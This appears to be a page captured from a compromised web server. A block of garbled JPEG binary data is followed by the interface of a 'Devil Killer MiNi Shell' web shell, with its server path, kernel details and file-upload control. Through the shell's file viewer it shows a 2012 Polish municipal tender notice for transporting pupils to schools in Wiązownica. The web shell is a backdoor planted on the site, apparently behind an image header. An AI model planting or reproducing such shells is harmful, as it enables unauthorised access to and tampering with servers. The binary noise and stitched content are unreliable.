JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/172051-N-2012.html

<p class="kh_header"><b>Wiązownica: DOWÓZ  UCZNIÓW  Z  TERENU  GMINY  WIĄZOWNICA  DO  SZKÓŁ PODSTAWOWYCH  I  GIMNAZJÓW  W  ROKU SZKOLNYM 2012/2013 WRAZ Z ZAPEWNIENIEM OPIEKI 
W CZASIE TRWANIA DOWOZU</b><br>
<b>Numer ogłoszenia: 172051 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ  UCZNIÓW  Z  TERENU  GMINY  WIĄZOWNICA  DO  SZKÓŁ PODSTAWOWYCH  I  GIMNAZJÓW  W  ROKU SZKOLNYM 2012/2013 WRAZ Z ZAPEWNIENIEM OPIEKI 
W CZASIE TRWANIA DOWOZU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług  w zakresie dowozu uczniów   do szkół podstawowych i gimnazjów  na terenie gminy Wiązownica w roku szkolnym 2012/2013  z zapewnieniem opieki w czasie dowozu. Dowóz uczniów do szkół  odbywał się będzie w dni nauki szkolnej z wyłączeniem przerw świątecznych, ferii zimowych oraz innych ustawowych wolnych dni od zajęć szkolnych.
Dowozem objęci będą  uczniowie  zamieszkali w następujących miejscowościach:
Dla zadania Nr 1 przewidziano 5 tras dowozu:
I trasa z miejscowości Wólka Zapałowska do Zespołu Szkół w Zapałowie, 
II trasa  z miejscowości Surmaczówka przez Ryszkowa Wola-Pohodaje do Zespołu Szkół w Zapałowie
III trasa z miejscowości Ryszkowa Wola przez Zapałów Buczynę do Zespołu Szkół w Zapałowie.
IV trasa z miejscowości  Cetula do Zespołu Szkól w Zapałowie.
Dla zadania Nr 2 przewidziano 2 trasy dowozu uczniów:
I trasa z miejscowości Manasterz przez Nielepkowice do Zespołu Szkół wWiązownicy.
II trasa z miejscowości  Wola Mołodycka przez Mołodycz, Radawę do Zespołu Szkół 
w Wiązownicy.
Dla zadania Nr 3 przewidziano 1 trasę dowozu  z  miejscowości  Szówsko - Krzyżówka przez Koniaczów, Surochów do Zespołu Szkół w Szówsku.
Dla zadania Nr 4 przewidziano 1 trasę  dowozu z miejscowości Radawa i Mołodycz do Szkoły Podstawowej w Mołodyczu.
Do dowozu uczniów do szkół  należy wykorzystywać pojazdy dopuszczone do ruchu w zakresie przewozów pasażerskich i odpowiednio oznakowane.
Podmiot, który będzie realizował przedmiot zamówienia będzie zobowiązany zabezpieczyć  odpowiednią liczbę środków transportu z odpowiednią ilością miejsc siedzących dostosowaną do ilości  dowożonych osób.
Dowóz uczniów będzie realizowany według opracowanego przez szkoły rozkładów godzin nauczania. Zamawiający dopuszcza możliwość zmiany godziny  dowozu i odwozu uczniów.
Przedmiot zamówienia będzie realizowany na niżej wyszczególnionych rejonach i trasach dowozu, na podstawie miesięcznych biletów szkolnych  wykupionych u przewoźnika - Wykonawcy.
Pojazdy służące do przewozu uczniów muszą być oznakowane, ubezpieczone oraz spełniać wymogi niezbędne do dopuszczenia do ruchu drogowego.
Wykonawca zobowiązany jest przez okres trwania niniejszej umowy posiadać polisę ubezpieczeniową od następstw nieszczęśliwych wypadków i odpowiedzialności cywilnej.
Wykonawca zapewnia opiekę nad  uczniami w czasie dowozu do szkoły.
4.1. PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA 4 ODRĘBNE ZADANIA.
ZADANIE   Nr 1  -   Dowóz  uczniów  z  terenu  gminy  Wiązownica  do Zespołu Szkół w Zapałowie  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania dowozu.
Trasa Nr 1 - dowóz uczniów na trasie  	Wólka Zapałowska - Zapałów;
Trasa Nr 2 - dowóz uczniów na trasie 	Surmaczówka - Pohodaje - Zapałów;		
Trasa Nr 3 - dowóz uczniów na trasie	Ryszkowa Wola - Zapałów-Buczyna- Zapałów;
Trasa Nr 4 - dowóz uczniów na trasie   	Cetula - Zapałów;

ZADANIE   Nr 2  -   Dowóz  uczniów  z  terenu  gminy  Wiązownica  do Zespołu Szkół w Wiązownicy  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania dowozu.
Trasa Nr 1 - dowóz uczniów na trasie  	Manasterz - Nielepkowice - Wiązownica;
Trasa Nr 1 - dowóz uczniów na trasie  	Mołodycz - Radawa - Wiązownica;	

ZADANIE   Nr 3  -   Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  Zespołu Szkół w Szówsku  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania dowozu.
Trasa Nr 1 - dowóz uczniów na trasie  	Szówsko - Krzyżówka -  Szówsko;

ZADANIE Nr 4  -  Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  szkoły podstawowej  w Mołodyczu w  roku szkolnym 2012/2013 wraz z zapewnieniem opieki 
w czasie trwania dowozu.
Trasa Nr 1 - dowóz uczniów na trasie	 Radawa - Mołodycz - Mołodycz Szkoła
	
    Odległości w km oraz ilość dowożonych dzieci dla poszczególnych tras dowozu podano w załączniku do SIWZ - Harmonogram  dowozu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedłożyć aktualną licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wiedzy i doświadczenia wykonawca musi przedłożyć dokumenty potwierdzające, że wykonał  co najmniej 1 usługę dowozu osób  o wartości min. 100 000 zł. odpowiadającej całemu przedmiotowi zamówienia -  w okresie ostatnich 3 lat, a  jeżeli  okres działalności jest krótszy, to w tym okresie z podaniem ich wartości, daty i   miejsce wykonania, lub  w odniesieniu do poszczególnych zadań  wykonanie co najmniej 1 usługę dowozu osób  o wartości   :
- dla zadania Nr 1   min. 30 000 zł.
- dla zadania Nr 2   min. 30 000 zł.
- dla zadania Nr 3   min. 10 000 zł.
- dla zadania Nr 4   min. 10 000 zł.
      Warunek w zakresie doświadczenia w realizacji usług, w przypadku oferty    wspólnej nie zostanie uznany za spełniony, jeżeli wykonawcy wykażą się wykonaniem robót  o różnym zakresie i o niższych wartościach od żądanej.   Wartość  i zakres wykonanych usług nie podlega bowiem sumowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku posiadania  odpowiedniego potencjału technicznego niezbędnego do wykonania zamówienia wykonawca musi przedłożyć  dokumenty potwierdzające, że posiada środki transportu nie starsze niż 15 lat ( data I rejestracji) w następującej ilości na poszczególne zadania: 
Zadanie nr 1 - 3  środkami transportu  z liczbą  min. 45 miejsc siedzących,
                    oraz 2 środkami transportu (BUSY) z liczba min. 20 miejsc siedzących
Zadanie nr 2 - 2  środkami transportu  z liczbą  min. 45 miejsc siedzących,
Zadanie nr 3 - 2  środkami transportu  z liczbą  min. 30 miejsc siedzących,
Zadanie nr 4 - 2  środkami transportu  z liczbą  min. 30 miejsc siedzących,
oraz dowody rejestracyjne i aktualne badania techniczne pojazdów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dysponowania osobami zdolnymi do wykonania 
zamówienia wykonawca musi przedłożyć dokumenty potwierdzające, że dysponuje lub będzie dysponował co najmniej: 
zadanie nr 1 - 5 kierowców  z uprawnieniami i aktualnymi badaniami;
zadanie nr 2 - 2 kierowców;
zadanie nr 3  - 2 kierowców;
zadanie nr 4  - 2 kierowców
posiadającymi kwalifikacje  i uprawnienia niezbędne do realizacji   przedmiotu zamówienia tj. prawo jazdy  odpowiedniej kategorii oraz aktualne badania lekarskie i orzeczenie  psychologiczne;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku w zakresie sytuacji ekonomiczno - finansowej   wykonawca musi przedłożyć dokumenty potwierdzające, że  posiada  opłaconą polisę lub inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę gwarancyjną  min. 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	formularz ofertowy,
-	kosztorys - wycena usługi,
-	parafowany projekt umowy,
-	pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia,
-	uprawnienia do kierowania pojazdami (autobusami) odpowiedniej kategorii;
-	aktualne orzeczenia psychotechniczne osób przewidzianych do wykonania zamówienia wraz z dowodami rejestracyjnymi i aktualnymi badaniami technicznymi;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany zawartej umowy mogą zostać dokonane wyłącznie za zgodą obu stron w formie   pisemnej pod rygorem nieważności.
2. Zmiany umowy, o których mowa w pkt. 1, mogą dotyczyć w szczególności: 
    a) terminu wykonania przedmiotu zamówienia, 
    b) zakresu i organizacji usługi, a w szczególności rozkładów jazdy, tras, odstąpienia od   
        realizacji części zamówienia, w szczególności w przypadku likwidacji trasy, 
    c) zmiany wynagrodzenia w przypadku ustawowej zmiany stawki podatku od 
        towarów i usług,  zwiększenia lub zmniejszenia liczby dowożonych uczniów, 
    d) zmiany harmonogramu dowozów, 
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży nw interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
    W  tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu  wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42  II p.
Cena materiałów przetargowych 20 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica
Sekretariat Urzędu
pok. nr 22  I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  Zespołu Szkół w Zapałowie  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania dowozu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług  w zakresie dowozu uczniów   do szkół podstawowych i gimnazjów  na terenie gminy Wiązownica w roku szkolnym 2012/2013  z zapewnieniem opieki w czasie dowozu. Dowóz uczniów do szkół  odbywał się będzie w dni nauki szkolnej z wyłączeniem przerw świątecznych, ferii zimowych oraz innych ustawowych wolnych dni od zajęć szkolnych.
Dowozem objęci będą  uczniowie  zamieszkali w następujących miejscowościach:
Dla zadania Nr 1 przewidziano 5 tras dowozu:
I trasa z miejscowości Wólka Zapałowska do Zespołu Szkół w Zapałowie, 
II trasa  z miejscowości Surmaczówka przez Ryszkowa Wola-Pohodaje do Zespołu Szkół w Zapałowie
III trasa z miejscowości Ryszkowa Wola przez Zapałów Buczynę do Zespołu Szkół w Zapałowie.
IV trasa z miejscowości  Cetula do Zespołu Szkól w Zapałowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz  uczniów  z  terenu  gminy  Wiązownica  do  Zespołu Szkół w Wiązownicy  w  roku szkolnym 2012/2013  wraz z zapewnieniem opieki w czasie trwania dowozu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług  w zakresie dowozu uczniów   do szkół  podstawowych i gimnazjów  na terenie gminy Wiązownica w roku szkolnym 2012/2013  z zapewnieniem opieki w czasie dowozu. Dowóz uczniów do szkół  odbywał się będzie w dni  nauki szkolnej z wyłączeniem przerw świątecznych, ferii zimowych oraz innych ustawowych wolnych dni od zajęć szkolnych.
Dowozem objęci będą  uczniowie  zamieszkali w następujących miejscowościach:
Dla zadania Nr 2 przewidziano 2 trasy dowozu uczniów:
I trasa z miejscowości Manasterz przez Nielepkowice do Zespołu Szkół wWiązownicy.
II trasa z miejscowości  Wola Mołodycka przez Mołodycz, Radawę do Zespołu Szkół 
   w Wiązownicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
